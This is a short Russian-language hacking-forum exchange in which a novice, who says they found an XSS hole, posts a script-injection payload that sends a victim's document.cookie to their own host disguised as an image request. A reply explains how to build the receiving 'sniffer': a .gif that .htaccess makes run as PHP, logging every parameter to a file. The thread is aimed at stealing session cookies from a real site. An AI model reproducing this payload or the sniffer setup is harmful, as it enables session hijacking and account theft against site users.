Нашел xss пытаюсь залить скрипт для сбора куков читал сдесь некоторые статьи где написано что надо вводить

Ввожу следующие

"><script>img = new Image();img.src="http://my site.org/s/HakNet.gif?"+document.cookie;</script>

и ни как не пойму почему картинка ? :D
и какой скрипт должен быть написан в картинке если вообще должен ? и после куда будут записыватся куки ? объясните пожалуйста , просто я в первые сталкиваюсь с этим ;)

неужели снифф?

С помощью всемогущего .htaccess "говорим" серверу, что картинка это - php. В нутри картинки код примерно следующего смысла: все что передали как параметр писать в файл, ну и иногда для приличия выводим картинку. А картинка это самый безобитный файл :-), ну если хочется то и с txt так же можно сделать.